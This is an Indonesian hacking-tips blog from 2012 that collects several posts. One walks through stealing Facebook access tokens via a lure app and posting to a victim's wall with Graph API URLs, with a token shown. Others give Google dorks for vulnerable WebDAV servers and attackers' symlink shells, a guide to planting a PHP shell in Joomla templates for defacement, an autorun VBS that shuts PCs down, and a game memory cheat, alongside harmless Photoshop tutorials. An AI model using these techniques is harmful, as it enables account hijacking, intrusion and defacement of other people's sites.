Sabtu, 14 Juli 2012

Bahaya Access Token Terhadap Akun Facebook Anda

Apa itu Access Token ?
Access Token merupakan struktur data yang berisi informasi keamanan yang dibutuhkan oleh sebuah proses untuk mengakses objek (dalam hal ini akun Facebook) atau proses lainnya yang membutuhkan otorisasi.

Dari mana Access Token tercipta ?
Seperti yang kita ketahui bersama, Facebook memiliki ribuan bahkan mungkin jutaan apps (aplikasi) untuk memanjakan penggunanya. Dari setiap penggunaan apps tersebutlah Access Token tercipta. Setiap Access Token akan tersimpan pada server hostingan pembuat aplikasi Facebook.

Kenapa dikatakan Access Token berbahaya ?
Apabila Access Token akun Facebook anda diketahui oleh orang yang tidak bertanggung jawab maka orang tersebut dapat meng-update-kan status Facebook anda, mem-posting link dan dapat pula memasukkan foto/gambar tanpa perlu melakukan login ke akun Facebook anda. Mungkin diantara kita pernah mendengar beberapa kasus pengguna Facebook berurusan dengan pihak Kepolisian bahkan sampai ke depan meja hijau akibat dari status Facebook-nya.

Bagaimana proses kerjanya ?
Di sini saya akan mempraktekkan proses kerjanya, bukan mengajarkan. Dan di akhir penjelasan nanti akan dijelaskan bagaimana cara untuk menghindarinya. Baiklah, mari kita mulai.
Pertama – tama saya akan login ke akun Facebook saya sendiri. Antara akun Facebook saya dengan Facebook korban tidak saling berteman. (jika berteman lebih baik lagi)


Sebelumnya, saya telah membuat sebuah aplikasi sederhana di Facebook. Dengan memanfaatkan tekhnik social engineering saya memberikan link aplikasi Facebook itu kepada korban agar tergiur untuk menggunakannya. Link aplikasinya adalahhttp://apps.facebook.com/via_apa_saja/ (Aplikasi Update Status Facebook Via Apa Saja)

Sang korban tergiur dan menggunakan aplikasi Facebook dari saya.




Untuk lebih memastikan apakah korban sudah menggunakan aplikasi Facebook dari saya, langsung saja saya login ke cpanel lalu menuju ke phpMyAdmin.



Dan ternyata si korban telah menggunakan aplikasi Facebook dari saya. Yang ditandai kotak warna merah adalah access_token Facebook korban.


Mari kita coba untuk meng-update-kan status Facebook korban dengan sedikit “injeksi url”
Injeksi url :
https://graph.facebook.com/ID-FACEBOOK/feed?method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :
https://graph.facebook.com/100003787395136/feed?method=POST&message=Test update status online :lol:&access_token=AAAFc7v
0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lVzykK8AKy40KkZA47M47c
NL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZDZD


Untuk melihat hasilnya silakan Anda klik "injeksi url" di atas lalu buka wall profil Facebook korban


Selanjutnya kita coba untuk mem-posting LINK ke akun Facebook korban.
Injeksi url :
https://graph.facebook.com/ID/feed?method=POST&link=URL&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :

https://graph.facebook.com/100003787395136/feed?method=POST&link=http://blog.cyber4rt.com&message=TestpostingLINK&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Srfio5lV
zykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixpQVPgZ
DZD


Terakhir, saya akan memasukkan sebuah gambar ke dalam akun Facebook korban.
Injeksi url :
https://graph.facebook.com/photos?url=URL GAMBAR&method=POST&message=KALIMAT&access_token=ACCESS-TOKEN-KORBAN

Menjadi :
https://graph.facebook.com/photos?url=http://www.cyber4rt.com/idsecconf2012/logo.png&method=POST&message=TEST UPLOAD GAMBAR&access_token=AAAFc7v0ZAmt0BABm1LZCTcYcwGdwhyXhR5xVv1Sr
fio5lVzykK8AKy40KkZA47M47cNL98P9IPQgqaJHd7WP2ryOU9Xf3GTyxgixp
QVPgZDZD




Bagaimana cara menghindari penggunaan Access Token oleh orang yang tidak bertanggung jawab ?Cara untuk menghindarinya cukup mudah yaitu :

Masuk ke Pengaturan Privasi Aplikasi Facebook
Cari aplikasi Facebook yang mencurigakan, contoh pada demo kali ini aplikasinya bernama ACCESS_TOKEN, klik edit (sunting) pada aplikasi tersebut.
Di sini ada beberapa pilihan, perhatikan gambar di bawah iniket :

merah : menghapus aplikasi dari akun Facebook Anda (direkomendasikan)
biru : menghapus akses aplikasi yang tidak Anda inginkan (pilihan)
hijau : mengatur siapa saja yang dapat melihat posting-an dari aplikasi, pilih "Only Me" (pilihan)
Akhir kata, jangan sembarang menggunakan aplikasi Facebook. Gunakan aplikasi Facebook hanya dari
sumber yang terpercaya. Sekian dan terima kasih, lebih dan kurangnya mohon dimaafkan

Credit :
Cyber4rtXkresssX-Technology

Jumat, 13 Juli 2012

Cheat Damage Ninja Saga











Sobat yang punya Facebook pasti sudah tahu game satu ini, yap tepat sekali yatu Ninja Saga.Game yang telah dirilis sejak 21 Juli 2009 ini sudah punya pemain sebanyak 4 Juta++, angka yang WOW *__*

Game ini memang agak susah - susah gampang sih....tapi menurut ane susah kalau gak pake cheat XD.

Cheat Leveling, Pet, Damage, Gold sudah ane coba karena terlalu susah Exam - examnya XD, apalagi Exam Tensai Spesial Jounin, player lain baru nyelesain 1 stage ane udah clear semua XD.

Kenapa malah jadi curhat kek gini -_-?

Ya udah ane langsung share cheatnya aja deh....




Tools : • Cheat Engine

• Browser Google Chrome / Mozilla Firefox

• Akun Facebook




Cara Penyajian :




1. Buka Facebook sobat, lalu buka Ninja Saga sobat.




2. Tunggu sampai pemilihan char, jangan di Play dulu !




3. Buka Cheat Engine, pilih gambar komputer di kiri atas, jika browser sobar Firefox pilih plugin containe.exe, jika Google Chrome pilih chrome.exe nanti akan muncul banyak coba 1 per 1.




4. Masukkan kode 62 04 D3 24 64 A3 A2 di kolom value, lalu klik First Scan.






aa




5. Jika sudah nani akan muncul 1 atau 2 addres di kolom samping kanan, klik 2 kali, nanti addres akan pindah ke kolom bawah.




6. Ganti value addres di kolom bawah dengan cara klik 2 kali atau klik kanan addres -> change record -> value. Ganti dengan kode 62 04 D3 24 64 A0 A2, lalu klik OK









7. Buka Ninja Saga kembali, pilih char yang ingin sobat, klik Play lalu coba lawan musuh yang sobat inginkan.




8. Violaa!!!Damagenya menjadi ratusan ribu *____*)b









Oh iya......ini cuman cheat damage bukan cheat OHK(One Hit Kill)!!Coba sobat lawan Vadar butuh beberapa serangan walaupun pakai cheat ini.

Sekian sajian dari saya. Terima kasih dan sampai jumpa di postingan berikutnya.

Cara Mengunci Flashdisk Tanpa Software





1. Buka Notepad


( Caranya : Start>>All Programs>>Accessories>>Notepad atau masuk di RUN lalu ketik notepaddan Enter) lalu copy paste script kode dibawah ini ke notepad



Flashdisk








on error goto 0


dim s,quest,sd,m,winpath,fs


set sd=createobject("Wscript.shell")


set fs=createobject("Scripting.FileSystemObject")


set winpath=fs.getspecialfolder(0)


set s=wscript.createobject("wscript.shell")


do while quest=""


quest=inputbox("Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer ini akan ShutDown!!!","http://katonn.com")


if quest="" then


m=MsgBox("Maaf anda belum memasukkan password...!", 0+0+48, "http://katonn.com")


end if


loop


if quest="TULIS PASSWORD DISINI" then


s.run "shutdown -a"


sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


else


s.run "shutdown -s -t 0"


end if






TULIS PASSWORD DISINI ganti sesuai keinginan anda, itu adalah sebagai tempat password anda. Pemakaian huruf kapital sangat berpengaruh. saya sarankan memakai angka yang sudah diingat di luar kepala.


lalu save as dengan nama dengan "passwordlock.vbs" tanpa tanda kutip, sebelum di save as pastikan pilih all files.






2. setelah selesai diatas.


lalu buka Notepad lagi, untuk pengaturan otomatis setelah flashdisk dimasukan di PC.


copy paste script kode dibawah ini ke notepad.






[Autorun]


shellexecute=wscript.exe passwordlock.vbs


action=FLASHDISK TELAH DILENGKAPI CODE






anda dapat merubah kata "FLASHDISK TELAH DILENGKAPI CODE" sesuai kata-kata mutiara keinginan anda sendiri.


setelah itu lakukan penyimpanan seperti file yang pertama, tetapi pada bagian File name tulislah "autorun.inf" tanpa tanda kutip, sebelum di save as pastikan pilih all files.






Kemudian pindahkan kedua file yang telah anda buat tadi (autorun.inf dan passwordlock.vbs) ke dalam flashdisk anda.

Selasa, 10 Juli 2012

Dork Webdav Lama namun Ampuh...



Dork Webdav yang masih Vuln :











“Powered by IIS”


intitle:"Directory Listing For /" + inurl:webdav tomcat


intitle:"Directory Listing For /" + inurl:webdav






inurl:*.edu/*.asp


inurl:.gov.*/*.asp


inurl:*.gov/*.asp


inurl:.org/*.asp


inurl:.ag/*.asp


inurl:.it/*.asp


inurl:.uk/*.asp


inurl:.co.il/*.asp


inurl:.com/*.asp


inurl:.co.id/*.asp


inurl:.ah.cn/*.asp


inurl:.bj.cn/*.asp


inurl:.cq.cn/*.asp


inurl:.fj.cn/*.asp


inurl:.gd.cn/*.asp


inurl:.gs.cn/*.asp


inurl:.gz.cn/*.asp


inurl:.gx.cn/*.asp


inurl:.ha.cn/*.asp


inurl:.hb.cn/*.asp


inurl:.he.cn/*.asp


inurl:.hi.cn/*.asp


inurl:.hl.cn/*.asp


inurl:.hn.cn/*.asp


inurl:.jl.cn/*.asp


inurl:.js.cn/*.asp


inurl:.jx.cn/*.asp


inurl:.ln.cn/*.asp


inurl:.nm.cn/*.asp


inurl:.nx.cn/*.asp


inurl:.qh.cn/*.asp


inurl:.sc.cn/*.asp


inurl:.sd.cn/*.asp


inurl:.sh.cn/*.asp


inurl:.sn.cn/*.asp


inurl:.sx.cn/*.asp


inurl:.tj.cn/*.asp


inurl:.tw.cn/*.asp


inurl:.xj.cn/*.asp


inurl:.xz.cn/*.asp


inurl:.yn.cn/*.asp


inurl:.zj.cn/*.asp


inurl:.ac.cn/*.asp


inurl:.com.cn/*.asp


inurl:.edu.cn/*.asp


inurl:.gov.cn/*.asp


inurl:.net.cn/*.asp


inurl:.org.cn/*.asp

Sejarah Hacker







Peretas (Inggris: hacker) adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.


Sejarah


Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.


Kemudian pada tahun 1983, istilah hacker berubah menjadi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.


Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (deafcing), menyisipkan kode-kode virus dsb. Padahal, mereka adalah cracker. Crackerlah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para hacker dipahami dibagi menjadi 2 golongan White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.


Cracker


Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, mencuri data dan umumnya melakukan cracking untuk keuntungan sendiri, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem.


Black hat hacker


Black hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yaitu mereka yang menerobos keamanan sistem komputer tanpa ijin, umumnya dengan maksud untuk mengakses komputer-komputer yang terkoneksi ke jaringan tersebut. Istilah cracker diajukan oleh Richard Stallman untuk mengacu kepada peretas dalam arti ini.


White hat hacker


White hat hacker adalah istilah teknologi informasi dalam bahasa Inggris yang mengacu kepada peretas yang secara etis menunjukkan suatu kelemahan dalam sebuah sistem komputer. White hat secara umum lebih memfokuskan aksinya kepada bagaimana melindungi sebuah sistem, dimana bertentangan dengan black hat yang lebih memfokuskan aksinya kepada bagaimana menerobos sistem tersebut.


Antihackerlink


Antihackerlink adalah kelompok Black Hat Hacker (Cracker) Indonesia yang identik dengan vandalisme.


Pendiri Antihackerlink (hC-) pernah menjadi anggota Kecoak Elektronik yang kemudian dikeluarkan atau dicabut status keanggotaanya atas perbuatan-perbuatannya yang merugikan Kecoak Elektronik dan pengguna Internet di Indonesia.


Anggota Antihackerlink kebanyakan adalah anak remaja usia belasan tahun yang sangat ingin menjadi hacker (hacker wanna be), dalam aksi mereka sering menimbulkan kerusakan pada sistem komputer yang berhasil mereka susupi dan meninggalkan jejak mereka sehingga berhasil ditelusuri oleh pihak berwajib (Polisi).


Hirarki / Tingkatan Hacker






1. Elite


Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.






2. Semi Elite


Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.






3. Developed Kiddie


Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.






4. Script Kiddie


Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.






5. Lamer


Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.


Kode Etik Hacker






1. Mampu mengakses komputer tak terbatas dan totalitas.


2. Semua informasi haruslah FREE.


3. Tidak percaya pada otoritas, artinya memperluas desentralisasi.


4. Tidak memakai identitas palsu, seperti nama samaran yang konyol, umur, posisi, dll.


5. Mampu membuat seni keindahan dalam komputer.


6. Komputer dapat mengubah hidup menjadi lebih baik.


7. Pekerjaan yang di lakukan semata-mata demi kebenaran informasi yang harus disebar luaskan.


8. Memegang teguh komitmen tidak membela dominasi ekonomi industri software tertentu.


9. Hacking adalah senjata mayoritas dalam perang melawan pelanggaran batas teknologi komputer.


10. Baik Hacking maupun Phreaking adalah satu-satunya jalan lain untuk menyebarkan informasi pada massa agar tak gagap dalam komputer.


Dua Jenis Kegiatan Hacking






1. Social Hacking, yang perlu diketahui : informasi tentang system apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelola server, koneksi yang dipergunakan jenis apa lalu bagaimana server itu tersambung internet, mempergunakan koneksi siapa lalu informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.


2. Technical Hacking, merupakan tindakan teknis untuk melakukan penyusupan ke dalam system, baik dengan alat bantu (tool) atau dengan mempergunakan fasilitas system itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam system atau service. Inti dari kegiatan ini adalah mendapatkan akses penuh kedalam system dengan cara apapun dan bagaimana pun.


Contoh Kasus Hacker






1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.


2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggris dapat diubah menjadi bahasa Indonesia. Oleh karena itu, status Digigumi adalah hacker, namun bukan sebagai perusak.


3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama partai di dalamnya menjadi nama-nama “unik”, seperti Partai Kolor Ijo, Partai Mbah Jambon, Partai Jambu, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004.


Hacker dalam film


Pada 1983 keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.


Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.


Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.


Tokoh peretas (Hacker)


Dennis M. Richie


Dennis lahir di Bronxiville, New York pada 9 September 1941. Ia memperoleh gelar BSc di bidang fisika dan gelar PhD Matematika Terapan di Universitas Harvard. Pada 1967, setahun sebelum tesis doktoralnya, ia mengikuti jejak ayahnya untuk bekerja di Bell Laboratories. Ia kemudian bekerja sama dengan Ken Thompson dalam menulis sistem operasi UNIX, sistem operasi pertama yang dapat dengan mudah digunakan di berbagai jenis komputer. Untuk menghasilkan sistem operasi semacam itu, ia dan Ken menyempurnakan bahasa pemrograman B karya Ken, dan kemudian menghasilkan bahasa C, yang digunakan untuk menulis UNIX.

Cara Upload shell Ke Target Joomla







Cara Upload shell Ke Target Joomla






untuk Master2x yang sudah pada tahu Lewati aja Deh ... xixixix Pisss .. :P


Deface atau pasang backdoor dengan target site joomla yang memanfaatkan komponen tambahan yang vulnerability seperti com_facebook atau komponen yang lainya biasanya rata rata menggunakan shell untuk upload file deface ke dalam hosting/database website tersebut. Inject shell dimaksutkan sebagai jalan alternatif lain untuk mengakses direktori dalam cpanel website tersebut. nah kadang kala untuk defacer newbie seperti saya ini lebih menyukai inject joomla karena disamping mudah juga praktis dan tahan lama. cara untuk inject shell ke dalam site tersubut adalah sebagai berikut.


- pertama tentunya kita siapkan target


( saya anggap password dan id site sudah anda dapatkan )






- untuk joomla admin login pada umunya adalan site.com/administrator


dan login menggunakan id dan pass yang telah anda dapatkan


- selanjutnya menuju ke template site dimana disana terdapat beberapa template site yang tersedia.


- perlu anda ketahui bahwa shell itu akan lebih mudah jika kita tanam di template site yang tersedia.


- pilih salah satu template yang tidak di pakai “Bukan default” untuk kita injectkan shell didalamnya


- masuk pada bagian edit html di template yang menjadi target, hapus semua code html default template dan pastekan code shell kita yang akan kita upload






————————————————————–


berikut ini adalah code shell nya :


Code Php Shell : http://Site.com/shell.txt






————————————————————–


Demo : http://www.site.org/templates/5enreal/index.php


Kemudian upload file deface kamu


————————————————————–


penting untuk di inggat Sebelum kamu daface Web orang jangan lupa backup Dulu indexnya Sebelum kamu sisip kan page Daface san kamu ... sebelum di apeli FBI .. xixixixixixix ... :P






Sumber : Google

Rampas Korban Hacking Symlink







Makin banyaknya korban Deface, tentu merupakan langkah selanjutnya dalam dunia security website dunia, dengan trick symlink yang telah beredar ini maka makin banyak korban yang bisa berjatuhan, hanya bermodalkan 1 website, maka website dalam 1 server bisa di rampas, sebelumnya para cracker masih mengandalkan trik jumping yang bisa mengambil alih website lain yang satu IP dengan victim nya.






Makin berkembangnya bentuk serangan maka makin lemahnya jutaan website yang ada didunia maya ini, artikel ini saya tulis selain berbentuk trik, tapi juga dengan kritikan untuk para cracker yang tidak mampu dalam melakukan modifikasi bentuk serangan yang mereka pelajari, padahal dengan melakukan modifikasi sesuai dengan kreatifitasan mereka, maka bentuk serangannya makin sulit di kenali oleh lamers seperti saya, karena mereka hanya menjalankan apa yang tertera pada POC Author teknik tersebut, maka mereka melakukan hal yang sama bahkan hampir 100% kemiripannya.


jadi menurutku, sangat mudah menebak, siapa saja yang jadi korban trik ini, dengan mengandalkan majalah google, kita sudah bisa menemukan korbannya...






kenapa demikian? karena mereka tidak mengerti apa sebenarnya yang mereka lakukan, mereka membuka pintu, tapi tidak bisa atau lupa menutup pintu tersebut, maka user google juga bisa masuk tanpa harus alami kesulitan. why??? karena Attacker nya sendiri yang salah, seperti yang tadi saya bilang, ibarat, membuka pintu dengan perintah sihir (Alakazamm Buka Pintu) tapi tidak menyebutkan perintah (Alakazam Tutup Pintu) orang yang kebetulan melintas, yah bisa masuk lah, dan bisa ikut menjarah didalamnya...


itupun kalau bukan Admin yang nutup pintunya, bakal tetap terbuka... terus bagaimana cara mengintip para korban Symlink? yah, cukup anda bermain Dork Google






Dork :


inurl:"sym/root/home/


inurl:"?sws=sym"


inurl:"sym.php"


inurl:"symlink.php"


intitle:"Symlink_Sa 2.0"


intitle:"Symlink_Sa 2.0 - "


intitle:"Symlink_Sa"

Minggu, 08 Juli 2012

software mempercepat internet








Flash speed 200% adalah salah satu software yang di gunakan untuk mempercepat akses internet. FlashSpeed 200% juga merupakan akselerator Internet yang membantu Anda mengoptimalkan kecepatan koneksi internet Anda 200% atau lebih. Perangkat lunak ini mengubah beberapa pengaturan Windows untuk memberikan kinerja yang lebih cepat, dan mengoptimalkan kecepatan koneksi Internet Anda 200% atau lebih menurut komputer Anda. Ini dukungan optimiz Dial-Up, Lan, Cable, ADSL, HDSL, VDSL dan koneksi PPPoE hingga 200% lebih cepat. Meningkatkan kecepatan download Anda.



Baca Selengkapnya Di : http://www.tipsdhent.com/2012/06/software-mempercepat-koneksi-internet.html#ixzz2027z8gSW

Sabtu, 07 Juli 2012

Tutorial Photoshop : Membuat Text Transparan










Pertama buka file gambar di photoshop. Lalu buat text dengan text tool dengan warna putih.





Gunakan font Times New Roman “60″, dan tulis text nya.


Lalu di text layer klik kanan dan pilih “Blending Options…”. pilih blending option Multiply.





lalu klik “Bevel and Emboss”. Dan sesuaikan dengan gambar dibawah





Eits….Jangan klik OK dulu, masih ada yang harus disetting.
Klik “Stroke”.





Nah sekarang boleh deh klik “OK.”


Gambar harus jadi kayak gini yaa..





Lalu klik kanan kembali layer text kemudian klik “Blending Options…”. Klik “Bevel and Emboss”. Supaya keliatan 3D.





Eits…jangan klik Ok… masih ada yang harus dikerjakan.
Sekarang tandai dan klik “Contour”. Settingan seperti gambar bawah.





Lalu klik Color Overlay.
Setting seperti gambar.





Lalu klik OK.
Lalu sambil tekan ctrl klik layer text. Maka akan keluar garis putus-putus di tepi huruf. Lalu buat layer baru dengan klik di toolbar layer > new > layer.
Masih di layer baru, klik brush tool dan gunakan blur brush 5px. Jangan lupa, foreground color dirubah menjadi putih.



Lalu warnai tepi huruf dengan brush tool tadi. Tipis saja supaya kelihatan
lebih terang. Lalu ganti blending mode dengan overlay.


Hasilnya harus seperti ini :





Selamat mencoba!

Membuat Animasi Berubah bentuk dengan Photoshop







Berhubung saya lagi suka animasi.. hehehe.. saya bikin yang animasi lagi aja yah..Postingan animasi pertama adalah yang bergerak.. tapi tidak bisa merubah bentuk, karena pake cara manual. Sekarang saya coba pake cara mengimport dari Layer .. jadi kita bisa ubah-ubah bentuknya sebelum dijadiin animasi. bingung ya? langsung aja deh..


Buka dokumen baru :





Klik CUstom Shape tool , pake yang Heart yaa.. biar bagus.. hehe





Klik Path selection tool… Klik kanan gambar heart lalu pilih Make selection..





Buat layer baru.. pake gradient tool untuk warnain Heart tadi.


Settingannya gini :





DUplikat gambar heart dengan menekan tombol CTRL + J .. lalu Kecilin.. jangan lupa sambil tekan tombol SHIFT + ALT biar letak hasil pengecilan nya tetep. ( bahasanya ribet amat ya..)





Duplikat lagi layer yang barusan jadi.. lalu kecilin lagi.. cara nya sama ya..





Duplikat sekali lagi..dan kecilin





Sekarang buat layer baru diatasnya layer background.





Delete layer background. Klik kanan layer background > delete layer


Posisi terakhir di Layer Palette





Sekarang buka jendela Animasi .. Klik Windows> animation





Klik Tombol menu yang ada dipojok jendela animasi lalu Klik Make Frames from Layer.





Semua layer terbagi rata berdasarkan Urutan dari layer bawah ke layer atas..





Delay Time nya Jadiin 0,1 second semua.


Hapus Frame yang kosong.. alias gak ada gambar nya alias blank.





Sekarang Save Hasilnya.. Klik File > Save for web & Devices





Hasilnya :





Selamat mencoba..


Coba terus otak atik… dan gabungin dengaan cara bikin animasi yang pertama.
COBA…COBA….COBA… sampe bisa

cara-membuat-batle-foto



Sebenarnya saya malas bikin tutor ini .. Tapi masih ada aja yang nanyain ke chat fb -__- . Yaudah saya buatin saja tutornya,
Gk perlu basa basi langsung saja, Saya hanya akan mengajarkan melalui photoscape ok :
Buka photoscapenya, pilih editor
Pilih fotonya
Klik object, pilih gambar gunung (entah apa namanya ), lalu pilih "photo" (liat gambar)




Cari gambar lawan batle, klik ok
Aka jadi seperti ini,




Samakan ukurannya. Pindahkan ke arah kanan, gunakan arah panah ->
Berikan sedikit ruang kosong untuk tulisan "VS" nya. (liat gambar)




Klik save, Berikut hasilnya, tadaaaa, jadi deh









Sekian tutorial dari saya, wassalam.

Jangan lupa tinggalkan komentar yah
 
Thanks Sudah Visit , Sekalian Follow, Gunakan Google Chrome Untuk Tampilan Sempurna !!!